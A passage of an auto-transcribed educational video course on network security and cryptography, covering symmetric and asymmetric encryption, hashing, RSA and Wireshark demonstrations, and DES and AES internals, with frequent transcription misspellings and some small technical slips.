in this section and the final one are going to be behavioral analytics behavioral analytics focus more on the statistics that are being carried over and stored through months and years of usage once some kind of similar pattern is noted but the IT administrator can detect some kind of attack the similar attacks can be stopped and the security can be further enhanced now that we have covered all that we need to know about network security the necessary tools it required types etc let’s go through the benefits of network security as a for the first which is protection against external threats the objective for cyber assaults can be as varied as the defenders themselves although they’re typically initiated for financial gain whether they are industrial spies activists or cyber criminals these bad actors all have one thing in common which is how quick clever and covert the attacks are getting a strong cyber security posture that considers routine software updates may assist firms in identifying and responding to the abuse techniques tools and the common entry points the next benefit is protection against internal threats the human aspect continues to be the cyber security systems weakest link insider risk can originate from current or former workers third party vendors or even trusted partners and they can be unintentional careless or downright evil aside from that the rapid expansion of remote work and the personal devices used for business purposes while even IoT devices in remote locations can make it easier for these kind of threats to go undetected until it’s too late however by proactively monitoring networks and managing access these dangers may be identified and dealt with before they become expensive disasters the third benefit is increased productivity it is nearly impossible for employees to function when networks and personal devices are slowed to a crawl by viruses and other cyber attacks during the operation of website and for the company to run you may significantly minimize violations and the amount of downtime required to fix the breach by implementing various cyber security measures such as enhanced firewalls virus scanning and automatic backups employee identification of possible email fishing schemes suspicious links and other malicious criminal activities can also be aided by education and training another benefit is brand trust and reputation customer retention is one of the most crucial elements in business development customers today place a premium on maintaining brand loyalty through a strong cyber security stance since this is the fastest way to get other businesses back get referrals and sell more tickets overall additionally it helps manufacturers get on the vendor list with bigger companies as a part of the supply chain which is only as strong as its weakest link this opens possibilities for potential future endeavors and development with the rise in censorship and general fear over privacy loss consumer security is at an all-time high risk technology has made our life so much easier while putting up a decent target on our personal information it is necessary to understand how to simultaneously safeguard our data and be up to date with the latest technological developments maintaining this balance has become easier with cryptography taking its place in today’s digital world so hey everyone this is Bever from SimplyLearn and welcome to this video on cryptography but before we begin if you love watching tech videos subscribe to our channel and hit the bell icon to never miss an update from Simply Learn so here’s a story to help you understand cryptography meet an wanted to look for a decent discount on the latest iPhone she started searching on the internet and found a rather shady website that offered a 50% discount on the first purchase once Anne submitted her payment details a huge chunk of money was withdrawn from her bank account just moments after devastated and quickly realized she had failed to notice that the website was an HTTP web page instead of an HTTPS one the payment information submitted was not encrypted and it was visible to anyone keeping an eye including the website owner and hackers had she used a reputed website which has encrypted transactions and employs cryptography a iPhone enthusiast could have avoided this particular incident this is why it’s never recommended to visit unknown websites or share any personal information on them now that we understand why cryptography is so important let’s take a look at the topics to be covered today we take a look into what cryptography is and how it works we learn where cryptography is being used in our daily lives and how we are benefiting from it then we will understand the different types of cryptography and their respective uses moving on we will look at the usage of cryptography in ancient history and a live demonstration of cryptography and encryption in action let’s now understand what cryptography is cryptography is the science of encrypting or decrypting information to prevent unauthorized access we transform our data and personal information so that only the correct recipient can understand the message as an essential aspect of modern data security using cryptography allows the secure storage and transmission of data between willing parties encryption is the primary route for employing cryptography by adding certain algorithms to jumble up the data decryption is the process of reversing the work done by encrypting information so that the data becomes readable again both of these methods form the basis of cryptography for example when simply learn is jumbled up or changed in any format not many people can guess the original word by looking at the encrypted text the only ones who can are the people who know how to decrypt the coded word thereby reversing the process of encryption any data pre- encryption is called plain text or clear text to encrypt the message we use certain algorithms that serve a single purpose of scrambling the data to make them unreadable without the necessary tools these algorithms are called ciphers they are a set of detailed steps to be carried out one after the other to make sure the data becomes as unreadable as possible until it reaches the receiver we take the plain text pass it to the cipher algorithm and get the encrypted data this encrypted text is called the cipher text and this is the message that is transferred between the two parties the key that is being used to scramble the data is known as the encryption key these steps that is the cipher and the encryption key are made known to the receiver who can then reverse the encryption on receiving the message unless any third party manages to find out both the algorithm and the secret key that is being used they cannot decrypt the messages since both of them are necessary to unlock the hidden content wonder what else we would lose if not for cryptography any website where you have an account can read your passwords important emails can be intercepted and their contents can be read without encryption during the transit more than 65 billion messages are sent on WhatsApp every day all of which are secured thanks to end-to-end encryption there is a huge market opening up for cryptocurrency which is possible due to blockchain technology that uses encryption algorithms and hashing functions to ensure that the data is secure if this is of particular interest to you you can watch our video on blockchain the link of which will be in the description of course there is no single solution to a problem as diverse as explained there are three variants of how cryptography works and is in practice they are symmetric encryption asymmetric encryption and hashing let’s find out how much we have understood until now do you remember the difference between a cipher and cipher text leave your answers in the comments and before we proceed if you find this video interesting make sure to give it a thumbs up before moving ahead let’s look at symmetric encryption first symmetric encryption uses a single key for both the encryption and decryption of data it is comparatively less secure than asymmetric encryption but much faster it is a compromise that has to be embraced in order to deliver data as fast as possible without leaving information completely vulnerable this type of encryption is used when data rests on servers and identifies personnel for payment applications and services the potential drawback with symmetric encryption is that both the sender and receiver need to have the same secret key and it should be kept hidden at all times caesar cipher and machine are both symmetric encryption examples that we will look into further for example if Alice wants to send a message to Bob she can apply a substitution cipher or a shift cipher to encrypt the message but Bob must be aware of the same key itself so he can decrypt it when he finds it necessary to read the entire message symmetric encryption uses one of the two types of ciphers stream ciphers and block ciphers block ciphers break the plain text into blocks of fixed size and use the key to convert it into cipher text stream ciphers convert the plain text into cipher text one bit at a time instead of resorting to breaking them up into bigger chunks in today’s world the most widely used symmetric encryption algorithm is AES 256 that stands for advanced encryption standard which has a key size of 256 bit with 128 bit and 196 bit key sizes also being available other primitive algorithms like the data encryption standard that is the dees the triple data encryption standard 3DES and blowfish have all fallen out of favor due to the rise of AES aes chops ups the data into blocks and performs 10 plus rounds of obscuring and substituting the message to make it unreadable asymmetric encryption on the other hand has a double whammy at its disposal there are two different keys at play here a public key and a private key the public key is used to encrypt information pre-transit and a private key is used to decrypt the information postrit if Alice wants to communicate with Bob using asymmetric encryption she encrypts the message using Bob’s public key after receiving the message Bob uses his own private key to decrypt the data this way nobody can intercept the message in between transmissions and there is no need for any secure key exchange for this to work since the encryption is done with a public key and the decryption is done with a private key that no one except Bob has access to both the keys are necessary to read the full message there is also a reverse scenario where we can use a private key for encryption and the public key for decryption a server can sign non-confidential information using its private key and anyone who has its public key can decrypt the message this mechanism also proves that the sender is authenticated and there is no problem with the origin of the information rsa encryption is the most widely used asymmetric encryption standard it is named after its founders Revest Shamir and Edelman and it uses block ciphers that separate the data into blocks and obscure the information widely considered the most secure form of encryption albeit relatively slower than AES it is widely used in web browsing secure identification VPNs emails and chat applications with so much hanging on the keys secrecy there must be a way to transmit the keys without others reading our private data many systems use a combination of symmetric encryption and asymmetric encryption to bolster security and match speed at the same time since asymmetric encryption takes longer to decrypt large amounts of data the full information is encrypted using a single key that is symmetric encryption that single key is then transmitted to the receiver using asymmetric encryption so you don’t have to compromise either way another route is using the defy helman key exchange which relies on a one-way function and is much tougher to break into the third variant of cryptography is termed as hashing hashing is a process of scrambling a piece of data beyond recognition it gives an output of fixed size which is known as the hash value of the original data or just hash in general the calculations that do the job of messing up the data collection form the hash function they are generally not reversible without resilient brute force mechanisms and are very helpful when storing data on website servers that need not be stored in plain text for example many websites store your account passwords in a hashed format so that not even the administrator can read your credentials when a user tries to login they can compare the entered password’s hash value with the hash value that is already stored on the servers for authentication since the function will always return the same value for the same input cryptography has been in practice for centuries julius Caesar used a substitution shift to move alphabets a certain number of spaces beyond their place in the alphabet table a spy can’t decipher the original message at first glance for example if he wanted to pass confidential information to his armies and decides to use a substitution shift of plus two A becomes C B becomes D and so on the word attack when passed through a substitution shift of plus three becomes dwwdefn this cipher has been appropriately named the Caesar cipher which is one of the most widely used algorithms the enigma is probably the most famous cryptographic cipher device used in ancient history it was used by the Nazi German armies in the world wars they were used to protect confidential political military and administrative information and it consisted of three or more rotors that scrambled the original message depending on the machine state at that time the decryption is similar but it needs both machines to stay in the same state before passing the cipher text so that we receive the same plain text message let’s take a look at how our data is protected while we browse the internet thanks to cryptography here we have a web-based tool that will help us understand the process of RSA encryption we see the entire workflow from selecting the key size to be used until the decryption of the cipher text in order to get the plain text back as we already know RSA encryption algorithm falls under the umbrella of asymmetric key cryptography that basically implies that we have two keys at play here a public key and a private key typically the public key is used by the sender to encrypt the message and the private key is used by the receiver to decrypt the message there are some occasions when this allocation is reversed and we will have a look at them as well in RSA we have the choice of key size we can select any key from a 512 bit to 124 bit all the way up to a 496 bit key the longer the key length the more complex the encryption process becomes and thereby strengthening the cipher text although with added security more complex functions take longer to perform the same operations on similar size of data we have to keep a balance between both speed and strength because the strongest encryption algorithms are of no use if they cannot be practically deployed on systems around the world let’s take a 124-bit key over here now we need to generate the keys this generation is done by functions that operate on passphrases the tool we are using right now generates the pseudo random keys to be used in this explanation once we generate the keys you can see the public key is rather smaller than the private key which is almost always the case these two keys are mathematically linked with each other they cannot be substituted with any other key and in order to encrypt the original message or decrypt the cipher text this pair must be kept together the public key is then sent to the sender and the receiver keeps the private key with himself in this scenario let’s try and encrypt a word simply learn we have to select if the key being used for encryption is either private or public since that affects the process of scrambling the information since we are using the public key over here let’s select the same and copy it and paste over here the cipher we are using right now is plain RSA there are some modified ciphers with their own pros and cons that can also be used provided we use it on a regular basis and depending on the use case as well once we click on encrypt we can see the cipher text being generated over here the pseudo random generating functions are created in such a way that a single character change in the plain text will trigger a completely different cipher text this is a security feature to strengthen the process from brute force methods now that we are done with the encryption process let’s take a look at the decryption part the receiver gets this cipher text from the sender with no other key or supplement he or she must already possess the private key generated from the same pair no other private key can be used to decrypt the message since they are mathematically linked we paste the private key here and select the same the cipher must always so be the same used during the encryption process once we click decrypt you can see the original plain text we had decided to encrypt this sums up the entire process of RSA encryption and decryption now some people use it the other way around we also have the option of using the private key to encrypt information and the public key to decrypt it this is done mostly to validate the origin of the message since the keys only work in pairs if a different private key is used to encrypt the message the public key cannot decrypt it conversely if the public key is able to decrypt the message it must have been encrypted with the right private key and hence the rightful owner here we just have to take the private key and use that to encrypt the plain text and select the same in this checkbox as well you can see we have generated a completely new cipher text this cipher text will be sent to the receiver and this time we will use the public key for decryption let’s select the correct checkbox and decrypt and we still get the same output now let’s take a look at practical example of encryption in the real world we all use the internet on a daily basis and many are aware of the implications of using unsafe websites let’s take a look at Wikipedia here pretty standard HTTPS website where the edge stands for secured let’s take a look at how it secures that data wireshark is the world’s foremost and most widely used network protocol analyzer it lets you see what’s happening on your network at a microscopic level and we are going to use the software to see the traffic that is leaving our machine and to understand how vulnerable it is since there are many applications running in this machine let’s apply a filter that will only show us the results related to Wikipedia [Music] let’s search for something that we can navigate the website with okay once we get into it a little you can see some of the requests being populated over here let’s take a look at the specific request these are the data packets that basically transport the data from our machine to the internet and vice versa as you can see there’s a bunch of gibberish data here that doesn’t really reveal anything that we searched or watched similarly other secured websites function the same way and it is very difficult if at all possible to snoop on user data this way to put this in perspective let’s take a look at another website which is a HTTP web page this has no encryption enabled from the server end which makes it vulnerable to attacks there is a login form here which needs legitimate user credentials in order to grant access let’s enter a random pair of credentials these obviously won’t work but we can see the manner of data transfer unsurprisingly we weren’t able to get into the platform instead we can see the data packets let’s apply a similar filter that will help us understand what request this website is sending these are the requests being sent by the HTTP login form to the internet if we check here you see whatever username and password that we are entering we can easily see it with the wireshark now we used a dummy pair of credentials if we select the right data packet we can find a correct credentials if any website had asked for a payment information or a legitimate credentials it would have been really easy to get a hold of these to reiterate what we have already learned you must always avoid HTTP websites and just unknown or not trustworthy websites in general because the problem we saw here is just the tip of the iceberg even though cryptography has managed to lessen the risk of cyber attacks it is still prevalent and we should always be alert to keep ourselves safe online there are two types of encryption in cryptography symmetric key cryptography and asymmetric key cryptography both of these categories have their pros and cons and differ only by the implementation today we are going to focus exclusively on symmetric key cryptography let us have a look at its applications in order to understand its importance better this variant of cryptography is primarily used in banking applications where personally identifiable information needs to be encrypted with so many aspects of banking moving onto the internet having a reliable safety net is crucial symmetric cryptography helps in detecting bank fraud and boost the security index of these payment gateways in general they are also helpful in protecting data that is not in transit and rest on servers and data centers these centers house a massive amount of data that needs to be encrypted with a fast and efficient algorithm so that when the data needs to be recalled by the respective service there is the assurance of minor to no delay while browsing the internet we need symmetric encryption to browse secure HTTPS websites so that we get an all-around protection it plays a significant role in verifying website server authenticity exchanging the necessary encryption keys required and generating a session using those keys to ensure maximum security this helps us in preventing the rather insecure HTTP website format so let us understand how symmetric key cryptography works first before moving on to the specific algorithms symmetric key cryptography relies on a single key for the encryption and decryption of information both the sender and receiver of the message need to have a pre-shared secret key that they will use to convert the plain text into cipher text and vice versa as you can see in the image the key used for encryption is the same key needed for decryptting the message at the other end the secret key shouldn’t be sent along with the cipher text to the receiver because that would defeat the entire purpose of using cryptography key exchange can be done beforehand using other algorithms like the defy helman key exchange protocol for example for example if Paul wants to send a simple message to Jane they need to have a single encryption key that both of them must get secret to prevent snooping on by malicious actors it can be generated by either one of them but must belong to both of them before the messages start flowing suppose the message I am ready is converted into cipher text using a specific substitution cipher by Paul in that case Jane must also be aware of the substitution shift to decrypt the cipher text once it reaches her irrespective of the scenario where someone manages to grab the cipher text mid-transit to try and read the message not having the secret key renders everyone helpless looking to snoop in the symmetric key algorithms like the data encryption standard have been in use since the 1970s while the popular ones like the EES have become the industry standard today with the entire architecture of symmetric cryptography depending on the single key being used you can understand why it’s of paramount importance to keep it secret on all occasions the side effect of having a single key for the encryption and decryption is it becomes a single point of failure anyone who gets their hand on it can read all the encrypted messages and do so mainly without the knowledge of the sender and the receiver so it is the priority to keep the encryption and decryption key private at all times should it fall into the wrong hands the third party can send messages to either the sender or the receiver using the same key to encrypt the message upon receiving the message and decrypting it with the key it is impossible to guess its origin if the sender somehow

transmits the secret key along with the cipher text anyone can intercept the package and access the information consequently this encryption category is termed private key cryptography since a big part of the data’s integrity is riding on the promise that the users can keep the key secret this terminology contrasts with asymmetric key cryptography which is called public key cryptography because it has two different keys at play one of which is public provided we manage to keep the keys secret we still have to choose what kind of ciphers we want to use to encrypt this information in symmetric key cryptography there are broadly two categories of ciphers that we can employ let us have a look stream ciphers are the algorithms that encrypt basic information one bit at a time it can change depending on the algorithm being used but usually it relies on a single bit or bite to do the encryption this is a relatively quicker alternative considering the algorithm doesn’t have to deal with blocks of data at a single time every piece of data that goes into the encryption can and needs to be converted into binary format in stream ciphers each binary digit is encrypted one after the other the most popular ones are the RC4 salsa and Panama the binary data is passed through an encryption key which is a randomly generated bitstream upon passing it through we receive the cipher text that can be transferred to the receiver without fear of man-in-the-middle attacks the binary data can be passed through an algorithmic function it can have either XR operations as it is most of the time or any other mathematical calculations that have the singular purpose of scrambling the data the encryption key is generated using the random bitstream generator and it acts as a supplement in the algorithmic function the output is in binary form which is then converted into the decimal or hexodimal format to give our final cipher text on the other hand block ciphers dissect the raw information into chunks of data of fixed size the size of these blocks depend on the exact cipher being used a 128 bit block cipher will break the plain text into blocks of 128 bit each and encrypt those blocks instead of a single digit once these blocks are encrypted individually they are chained together to form a final cipher text block ciphers are much slower but they are more tamperproof and are used in some of the most widely used algorithms employed today just like stream ciphers the original cipher text is converted into binary format before beginning the process once the conversion is complete the blocks are passed through the encryption algorithm along with the encryption key this would provide us with the encrypted blocks of binary data once these blocks are combined we get a final binary string this string is then converted into hexodimal format to get our cipher text today the most popular symmetric key algorithms like AES DEES and 3DES are all block cipher methodology subsets with so many factors coming into play there are quite a few things symmetrically cryptography excels at while falling short in some other symmetric key cryptography is much faster variant when compared to asymmetric cryptography there is only one key in play unlike asymmetric encryption and this drastically improves calculation speed in the encryption and decryption similarly the performance of symmetric encryption is much more efficient under similar computational limitations fewer calculations help in better memory management for the whole system bulk amounts of data that need to be encrypted are very well suited for symmetric algorithms since they are much quicker handling large amounts of data is simple and easy to use in servers and data farms this helps in better latency during data recall and fewer mixed packets thanks to its simple single key structure symmetric key cryptography algorithms are much easier to set up a communication channel with and offer a much more straightforward maintenance duties once the secret key is transmitted to both the sender and receiver without any prior mishandling the rest of the system aligns easily and everyday communications becomes easy and secure if the algorithm is applied as per the documentation symmetric algorithms are very robust and can encrypt vast amounts of data with very less overhead dees algorithm stands for data encryption standard it is a symmetric key cipher that is used to encrypt and decrypt information in a blockby-block manner each block is encrypted individually and they’re later chained together to form our final cipher text which is then sent to a receiver ds takes the original unaltered piece of data called the plain text in a 64-bit block and it is converted into an encrypted text that is called the cipher text it uses 48 bit keys during the encryption process and follows a specific structure called the fisal cipher structure during the entire process it is a symmetric key algorithm which means DS can reuse the keys used in the encryption format to decrypt the cipher text back to the original plain text once the 64-bit blocks are encrypted they can be combined together before being transmitted let’s take a look at the origin and the reason DES was founded dees is based on a fisal block cipher called Lucifer developed in 1971 by IBM cryptography researcher Host Fistol dees uses 16 rounds of this fisal structure using a different key for each round it also utilizes a random function with two inputs and provides a single output variable ds becames the organization’s approved encryption standard in November 1976 and was later reaffirmed as a standard in 1983 1988 and finally in 1999 but eventually DES was cracked and it was no longer considered a secure solution for all official roots of communication consequently tripleds was developed tripleds is a symmetric key block cipher that uses a double DS cipher encrypt with the first key delete encryption with the second key and encrypt again with a third key there is also a variation of the two keys where the first and second key are duplicate of each other but triple DS was ultimately deemed too slow for the growing need for fast communication channels and people eventually fell back to using DS for encrypting messages in order to search for a better alternative a publicwide competition was organized and helped cryptographers develop their own algorithm as a proposal for the next global standard this is where the reindal algorithm came into play and was later credited to be the next advanced encryption standard for a long time dees was the standard for data encryption for data security its rule ended in 2002 when finally the advanced encryption standard replaced dees as an acceptable standard following a public competition for a place to understand the structure of a fistol cipher you can use the following image as a reference the block being encrypted is divided into two parts one of which is being passed onto the function while the other part is exorded with the function’s output the function also uses the encryption key that differs for each individual round this keeps going on until the last step until where the right hand side and the left hand side are being swapped here we receive our final cipher text for the decryption process the entire procedure is reversed starting from the order of the keys to the block sorting if the entire process is repeated in a reverse order we will eventually get back our plain text and this simplicity helps the speed overall this was later detrimental to the efficiency of the algorithm hence the security was compromised a fistl block cipher is a structure used to derive many symmetry block ciphers such as dees which as we have discussed in our previous comment pistl cipher proposed a structure that implement substitution and permutation alternately so that we can obtain cipher text from the plain text and vice versa this helps in reducing the redundancy of the program and increases the complexity to combat brute force attacks the fistl cipher is actually based on the shannon structure that was proposed in 1945 the fistl cipher is the structure suggested by horse fistl which was considered to be a backbone while developing many symmetric block ciphers the shannon structure highlights the implementation of alternate confusion and diffusion and like we already discussed the festal cipher structure can be completely reversed depending on the data however we must consider the fact that to decrypt the information by reversing the fal structure we will need the exact polomial functions and the key orders to understand how the blocks are being calculated we take a plain text which is of 64bit and that is later divided into two equal halves of 32-bit each in this the right half is immediately transferred to the next round to become the new left half of the second row the right hand is again passed off to a function which uses an encryption key that is unique to each round in the file cipher whatever the function gives off as an output it is passed on as an exor input with the left half of the initial plain text the next output will become the right half of the second round for the plain text this entire process constitutes of a single round in the fistl cipher taking into account what happens in a polomial function we take one half of the block and pass it through an expansion box the work of the expansion box is to increase the size of the half from 32-bit to 48 bit text this is done to make the text compatible to a 48 bit keys we have generated beforehand once we pass it through the exo function we get a 48 bit text as an output now remember a half should be of 32bit so this 48 bit output is then later passed on to a substitution box this substitution box reduces its size from 48 bit to 32bit output which is then later exorted with the first half of the plain text a block cipher is considered the safest if the size of the block is large but large block sizes can also slow down encryption speed and the decryption speed generally the size is 64bit sometimes modern block ciphers like AES have a 128 bit block size as well the security of the block cyber increases with increasing key size but larger key sizes may also reduce the speeds of the process earlier 64-bit keys were considered sufficient modern ciphers need to use 128 bit keys due to the increasing complexity of today’s computational standards the increasing number of rounds also increase the security of the block cipher similarly they are inversely proportional to the speed of encryption a highly complex round function enhances the security of the block cipher albeit we must maintain a balance between the speed and security the symmetric block cipher is implemented in a software application to achieve better execution speed there is no use of an algorithm it it cannot be implemented in a real life framework that can help organizations to encrypt or decrypt the data in a timely manner now that we understand the basics of fistl ciphers we can take a look at how dees manages to run through 16 rounds of the structure and provide the cipher text at the end now that we understand the basics of fest ciphers we can take a look at how DES manages to run through 16 rounds of this structure and provide a cipher text in simple terms DS takes a 64-bit plain text and converts it into a 64-bit cipher text and since we’re talking about asymmetric algorithms the same key is being used when it is decrypting the data as well we first take a 64-bit clip plane text and we pass it through an initial permutation function the initial permutation function has the job of dividing the block into two different parts so that we can perform fist cipher structures on it there are multiple rounds being procured in the DS algorithm namely 16 rounds of fis cipher structure each of these rounds will need keys initially we take a 56- bit cipher key but it is a single key we pass it on to a round key generators which generates 16 different keys for each single round that the fisal cipher is being run these keys are passed on to the rounds as 48 bits the size of these 48 bits keys is the reason we use the substitution and permutation bongs in the polomial functions of the special ciphers when passing through all these rounds we reach round 16 where the final key is passed on from the round key generator and we get a final permutation in the final permutation the rhymes are swapped and we get our final cipher text this is the entire process of dees with 16 rounds of ciphers encompassed in it to decrypt our cipher text back to the plain text we just have to reverse the process we did in the DES algorithm and reverse the key order along with the functions this kind of simplicity is what gave dees the bonus when it comes to speed but eventually it was detrimental to the overall efficiency of the program when it comes to security factors dees have five different modes of operation to choose from this one of those is electronic code book each 64-bit block is encrypted and decrypted independently in the electronic code book format we also have cipher blockchaining or the CBC method here each 64-bit block depends on the previous one and all of them use an initialization vector we have a cipher feedback block mechanism where the preceding cipher text becomes the input for the encryption algorithm it produces a pseudo random output which in turn is exort with the plain text there is an output feedback method as well which is the same as cipher feedback except that the encryption algorithm input is the output from the preceding DES a counter method has a different way of approach where each plain text block is exord with an encrypted counter the counter is then incremented for each subsequent block there are a few other alternatives to these modes of operation but the five mentioned above are the most widely used in the industry and recommended by cryptographers worldwide let’s take a look at the future of DES the dominance of DEES ended in 2002 when the advanced encryption standard replaced the DES encryption algorithm as the accepted standard it was done following a public competition to find a replacement nist officially withdrew the global acceptance standard in May 2005 although tripleds has approved for some sensitive government information through 2030 nist also had to change the DS algorithm because its key length was too short given the increased processing power of the new computers encryption power is related to the size of the key and DS found itself a victim of ongoing technological advances in computing we have received a point where 56-bit was no longer a challenge to the computers of tracking note that because DES is no longer the NIST federal standard does not mean that it is no longer in use triple DS is still used today and is still considered a legacy encryption algorithm to get a better understanding of how these keys and cipher text look like we can use an online tool for our benefit as we already know to encrypt any kind of data a key is mandatory this key can be generated using mathematical functions or computerized key generation program such as this website offers it can be based on any piece of text let’s say the word is simply [Music] learn in our example once the key is settled we provide the plain text or the clear text that needs to be encrypted using the aforementioned key suppose our sentence for this example is this is my first message we have satisfied two prerequisites the message and the key another variable that goes into play is the mode of operation we have already learned about five different modes of operation while we can see some other options here as well let us go with the CBC variant which basically means the cipher blockchaining method one of CBC’s key characteristics is that it uses a chaining process it causes the decryption of a block of cipher text to depend all on the preceding cipher text blocks as a result the entire validity of all the blocks is contained in the previous adjacent blocks as well a single bit error in a cipher text block affects the decryption of all the subsequent blocks rearrangement of the order of these for example can cause the decryption process to get corrupted regarding the manner of displaying binary information we have two options here we can either go with B 64 or the hexodimal format let’s go with the base 64 right now as you can see the cipher text is readily available b 64 is a little more efficient than heads so we will be getting a smaller cipher text when it comes to B 64 albeit the size of both the formats will be the same the hex has a longer cipher text since B 64 takes four characters for every three bytes while hex will take two characters for each bite hence B 64 turns out to be more efficient now to decrypt the cipher text we go by the same format choose B 64 we copy the cipher text onto a decryption tool and we have to make sure that the key we are using is exactly the same we choose similar mode of operation and we choose the correct encoding format as well which is B 64 in this case as you can see the decryption is complete and we get a plain text back even if you keep everything the same but we just change the encoding format it will not be able to decrypt anything unfortunately DS has become rather easy to crack even without the help of a key the advanced encryption standard is still on top when it comes to symmetric encryption security and will likely stay there for a while eventually with so much computing power growth the need for a stronger algorithm was necessary to safeguard our personal data as solid as dees was the computers of today could easily break the encryption with repeated attempts thereby rendering the data security helpless to counter this dilemma a new standard was introduced which was termed as the advanced encryption standard or the AES algorithm let’s learn what is advanced encryption standard the AES algorithm also known as the reindial algorithm is a symmetric block cipher with a block size of 128 bits it is converted into cipher text using keys of 128 192 or 256 bits it is implemented in software and hardware throughout the world to encrypt sensitive data the National Institute of Standards and Technology also known as NIST started development on AES in 1997 when it was announced the need for an alternative to the data encryption standard the new internet needed a replacement for dees because of its small key size with increasing computing power it was considered unsafe against entire key search attacks the tripleds was designed to overcome this problem however it was deemed to be too slow to be deployed in machines worldwide strong cases were present by the Mars RC6 Serpent and the Twofish algorithms but it was the ringal encryption algorithm also known as AES which was eventually chosen as the standard symmetric key encryption algorithm to be used its selection was formalized with the release of federal information processing standards publication 197 in the November of 2001 it was approved by the US Secretary of Commerce now that we understand the origin of AES let us have a look at the features that make AES encryption algorithm unique the AES algorithm uses a substitution permutation or SP network it consists of multiple rounds to produce a cipher text it has a series of linked operations including replacing inputs with specific outputs that is substitutions and others that involve bit shuffling which is permutations at the beginning of the encryption process we only start out with a single key which can be either a 128 bit key a 192 bit key or a 256- bit key eventually this one key is expanded to be used in multiple rounds throughout the encryption and the decryption cycle interestingly AES performs all its calculations on bite data instead of bit data as seen in the case of the DES algorithm therefore AES treats 128 bits of a clear text block as 16 bytes the number of rounds during the encryption process depends on the key size that is being used the 128 bit key size fixes 10 rounds the 192 bit key size fixes 12 rounds and the 256 bit key holds 14 rounds a round key is required for each of these rounds but since only one key is input into the algorithm the single key needs to be expanded to get the key for each round including the round zero with so many mathematical calculations going on in the background there are bound to be a lot of steps throughout the procedure let’s have a look at the steps followed in AES before we move ahead we need to understand how data is being stored during the process of AES encryption everything in the process is stored in a 4 into 4 matrix format this matrix is also known as a state array and we’ll be using these state arrays to transmit data from one step to another and from one round to the next round each round takes state array as input and gives a straight array as output to be transferred into the next round it is a 16 byt matrix with each cell representing one bite with each four bytes representing a word so every state array will have a total of four words representing it as we previously discussed we take a single key and expand it to the number of rounds that we need the key to be used in let’s say the number of rounds are n that the key has to be expanded to be used with n +1 rounds because the first round is the key zero round let’s say n is the number of rounds the key is expanded to n + one rounds it is also a state array having four words in its vicinity every key is used for a single round and the first key is used as a round key before any round begins in the very beginning the plain text is captured and passed through an exor function with the round key as a supplement this key can be considered the first key from the n +1 expanded set moving on the state array resulting from the above step is passed on to a bite substitution process beyond that there is a provision to shift rows in the state arrays later on the state array is mixed with a constant matrix to shuffle its column in the mix column segment after which we add the round key for that particular round the last four steps mentioned are part of every single round that the encryption algorithm goes through the state arrays are then passed from one round to the next as an input in the last round however we skip the mix columns portion with the rest of the process remaining unchanged but what are these byte substitution and row shifting processes let’s find out regarding each step in more detail in the first step the plain text is stored in a state array and is exorbed with the k0 which is the first key in the expanded key set this step is performed only once on a block while being repeated at the end of each round as per iteration demands the state array is exor with the key to get a new state array which is then passed over as input to the sub bytes process in the second stage we have byte substitution we leverage an xbox called as a substitution box to randomly switch data among each element every single bite is converted into a hexodimal value having two parts the first part denotes the row value and the second part denotes the column value the entire state array is passed through the SB box to create a brand new state array which is then passed off as an input to the row shifting process the 16 input bytes are replaced by looking at a fixed table given in the design we finally get a matrix with four rows and four columns when it comes to row shifting each bit in the four rows of the matrix is shifted to the left an entry that is a fall-off is reinserted to the right of the line the change is done as follows the first line is not moved in any way the second line is shifted to a single position to the left the third line is shifted two positions to the left and the fourth line is shifted three positions to the left the result is a new matrix that contains the same 16 bytes but has been moved in relation to each other to boost the complexity of the program in mixed columns each column of four bytes is now replaced using a special mathematical function the function takes four bytes of a column as input and outputs four completely new bytes we will get a new matrix with the same size of 16 bytes and it should be noted that this phase has not been done in the last round of the iteration when it comes to adding a round key the 16 bytes of the matrix are treated as 128 bits and the 128 bits of the round key are exort if it is the last round the output is the cipher text if you still have a few rounds remaining the resulting 128 bits are interpreted as 16 bytes and we start another similar round let’s take an example to understand how all these processes work if our plain text is the string 2192 we first convert it into a hexadimal format as follows we use an encryption key which is that’s my kung fu and it is converted into a hexadimal format as well as per the guidelines we use a single key which is then later expanded into n +1 number of keys in which case it’s supposed to be 11 keys for 10 different rounds in round zero we add the round key the plain test is exor with the k0 and we get a state array that is passed off as an input to the substitution byes process when it comes to the substitution bytes process we leverage an sbox to substitute the elements of each bite with a completely new bite this way the state array that we receive is passed off as an input to the row shifting process of the next step when it comes to row shifting each element is shifted a few places to the left with the first row being shifted by zero places second row by one place third row by two places and the last by three the state array that we received from the row shifting is passed off as an input to mix columns in mix columns we multiply the straight array with a constant matrix after which I receive a new state array to be passed on onto the next step we add the new state array as an exor with the round key of the particular iteration whatever state array we receive here it becomes an output for this particular round now since this is the first round of the entire encryption process the state array that we receive is passed off as an input to the new round we repeat this process for 10 more rounds and we finally receive a cipher text once the final state array can be denoted in the hexodimal format this becomes our final cipher text that we can use for transferring information from the sender and receiver let’s take a look at the applications of AES in this world aes finds most use in the area of wireless security in order to establish a secure mode of authentication between routers and clients highly secure mechanisms like WPA and WPA2 PSK are extensively used in securing Wi-Fi endpoints with the help of renal’s algorithm it also helps in SSL TLS encryption that is instrumental in encrypting our internet browser sessions aes works in tandem with other asymmetric encryption algorithms to make sure the web browser and web server are properly configured and use encrypted channels for communication aes is also prevalent in general file encryption of various formats ranging from documents to the media files having a large key allows people to encrypt media and decrypt data with maximum security possible aes is also used for processor security in hardware appliances to prevent machine hijacking among other things as a direct successor to the dees algorithm there are some aspects that AES provides an immediate advantage in let us take a look when it comes to key length the biggest flaw in DES algorithm was its small length was easily vulnerable by today’s standards aes has managed to nab up 128 192 and 256 bit key lengths to bolster the security further the block size is also larger in AES owing to more complexity of the algorithm the number of rounds in dees is fixed irrespective of the plain text being used in AES the number of round depends on the key length that is being used for the particular iteration thereby providing more randomness and complexity in the algorithm the DES algorithm is considered to be simpler than AES even though AES beats DES when it comes to relative speed of encryption and decryption this makes advanced encryption standard much more streamlined to be deployed in frameworks and systems worldwide when it compares to the data encryption standard hello in our last video on cryptography we took a look at symmetric key cryptography we used a single private key for both the encryption and decryption of data and it works very well in theory let’s take a look at a more realistic scenario now let’s meet Joe joe is a journalist who needs to communicate with Ryan via long-distance messaging due to the critical nature of the information people are waiting for any message to leave Joe’s house so that they can intercept it now Joe can easily use symmetrically cryptography to send the encrypted data so that even if someone intercepts the message they cannot understand what it says but here’s the tricky part how will Joe send the required decryption key to Ryan the sender of the message as well as the receiver need to have the same decryption key so that they can exchange messages otherwise Ryan cannot decrypt the information even when he receives the cipher text if someone intercepts the key while transmitting it there is no use in employing cryptography since the third party can now 